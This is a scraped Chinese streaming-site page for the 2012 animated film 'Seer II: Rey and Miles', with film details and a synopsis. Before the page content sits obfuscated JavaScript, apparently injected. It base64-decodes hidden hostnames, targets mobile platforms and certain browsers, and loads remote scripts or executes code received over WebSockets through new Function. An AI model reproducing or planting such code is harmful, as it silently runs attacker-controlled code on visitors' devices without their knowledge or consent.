function xmIDhB(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function OdzNm(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return xmIDhB(t);};window[''+'b'+'f'+'B'+'e'+'A'+'x'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=OdzNm,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5nLm1pY3Jvc3Nlci5jbg==','dHIueWVzdW42NzguYY29t','151670',window,document,['','Y']);}:function(){};
var x=window['atob'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA3Nw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['CIasZabYAM']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

赛尔号大电影2之雷伊与迈尔斯

资源:赛尔号大电影2之雷伊与迈尔斯 电影完整版在线观看

类型:动漫片 2012

云播放

  • 云播放

《赛尔号大电影2之雷伊与迈尔斯》迅雷下载

《赛尔号大电影2之雷伊与迈尔斯》剧情介绍

赛尔号大电影2之雷伊与迈尔斯

◎片  名 赛尔号大电影2之雷伊与迈尔斯
◎译  名 赛尔号2:雷伊与迈尔斯 / 赛尔号大电影2:雷伊与迈尔斯 / Seer II
◎年  代 2012
◎产  地 中国大陆
◎类  别 动画,奇幻,冒险
◎语  言 汉语普通话
◎上映日期 2012-06-28
◎豆瓣评分 4.8
◎豆瓣链接  10799213
◎主  演 武艺,杨梦露,刘钦

◎简  介
赛尔号超级精灵争霸大赛即刻就要开始啦!咦?你仲唔知?快去问罗杰船主、贾斯丁站长同雷蒙教官啦!呢,但系赛尔机械人历史上最伟大嘅一届精灵争霸赛!所有最副人气嘅选手都将加!快睇吓,我哋最钟意赛小息!阿铁打!卡璐璐!曾经拯救赛尔号嘅英雄小墨!授勋官克罗之子小克!各位精灵训练大师都喺整装待发啦!咪咔!雷伊!里奥斯!泰瑞!炎火马骝!布鲁……所有最新最强大嘅火爆精灵悉数登场,点燃你全部嘅想!赛尔号大电影2,精灵争霸赛全面升!
原本宁静嘅比格星,天际异火即将降临!浩瀚罗格星系嘅未知角落头,穿越亿万年嘅神秘力量即将献世!波涛汹涌嘅异象之下,究竟埋藏住点嘅真相?妄图操纵呢埲力量嘅宇宙海贼欧比组织,究竟又将酿造出咩惊天大阴谋?究竟系边个,嚟拯救成宇宙免于呢场史无前例嘅大浩劫?答案系一个——“赛尔先锋战斗小队!出击!”星际探险员赛小息、阿铁打、卡璐璐来啦!佢哋将再次重装上阵!
一个,系笼罩住神秘面纱嘅未知神兽,另一个,系我哋最熟嘅精灵之王!一个,系浩瀚宇宙中嘅天生霸者!另一个,系惊天动地嘅传奇英雄!一个,系传说中除咗谱尼之外嘅第二只圣灵绑精灵!另一个,系毕生捍卫住赫尔卡星嘅雷暴之神!曾经泣血并肩战斗嘅盟友,畀命运之神背叛后嘅重逢!所有一切,都将终点于呢场堪称火星撞地球嘅对决!史上最强嘅面对面碰撞!冇天下,一骑当神!超越时空嘅大激斗!迈尔斯,同雷伊,最强VS强!边个先系真正嘅王者?

赛尔号大电影2之雷伊与迈尔斯剧照1

赛尔号大电影2之雷伊与迈尔斯剧照2

赛尔号大电影2之雷伊与迈尔斯剧照3

赛尔号大电影2之雷伊与迈尔斯剧照4

Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved